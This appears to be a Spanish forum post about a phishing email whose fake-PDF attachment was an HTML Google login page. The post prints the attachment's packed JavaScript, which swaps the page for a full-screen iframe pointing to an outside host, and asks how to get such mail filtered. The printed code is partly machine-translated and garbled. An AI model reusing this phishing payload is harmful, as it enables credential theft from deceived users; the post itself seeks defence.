Nuestra oficina recibió un correo electrónico en Navidad. Había lo que parecía ser un archivo PDF adjunto.
Cuando examinamos el archivo, en realidad se trataba de un archivo Html para una página de inicio de sesión falsa de google.
También tenía una gran cantidad de <Script>
codificado
El script decodificado es:
eval (función (p, a, c, k, e, d) {e = función (c) {return (c35? String.fromCharCode (c + 29): c.toString (36))}; if (! ''. reemplace (/ ^ /, String)) {while (c -) {d [e (c)] = k [c] || e (c)} k = [function (e) {return d [e]}]; e = function () {return '\ w +'}; c = 1}; while (c -) {if (k [c]) {p = p.replace (new RegExp (' \ b '+ e (c) +' \ b ',' g '), k [c])}} return p} (' 3.2.b="8 \ 'agrl"; k {(j () {m 1 = 3.2.n (\ '1 \'); 1.p = \ 'o / x-4 \'; 1.i = \ '9 4 \'; 1.h = \ '6: // cf / d / q / D / HG \ '; 2.s (\' F \ ') [0] .I (1)} ())} J (e) {} 3.2.KL="< 5 E = \ "6: // wv / u / ty \" z = \ "C: 0; B: 7%; A: 7% \" > "; ', 48,48,' | link | document | window | icon | | iframe | http | 100 | Usted | acceso directo | ve | título | kitt | asset || ai | been | href | rel | function | try | out | var | createElement | image | type | img | signed | getElementsByTagName | daiso | vasdu | top | bowlanreedesntal || html | estilo | altura | ancho | borde | guoguo | src | cabeza | ico | google | anexar | cuerpo | outerHTML'.split ('|'), 0, {}
Es interesante que la URL en el archivo HTML era la correcta página de inicio de sesión de Google
Pensé que los correos electrónicos con scripts se marcarían automáticamente, de forma similar a enviar un archivo .exe
o .bat
¿Hay alguna precaución adicional que podamos tomar para garantizar que los mensajes como este se marquen o pasen a ser spam en el futuro sin la intervención del usuario?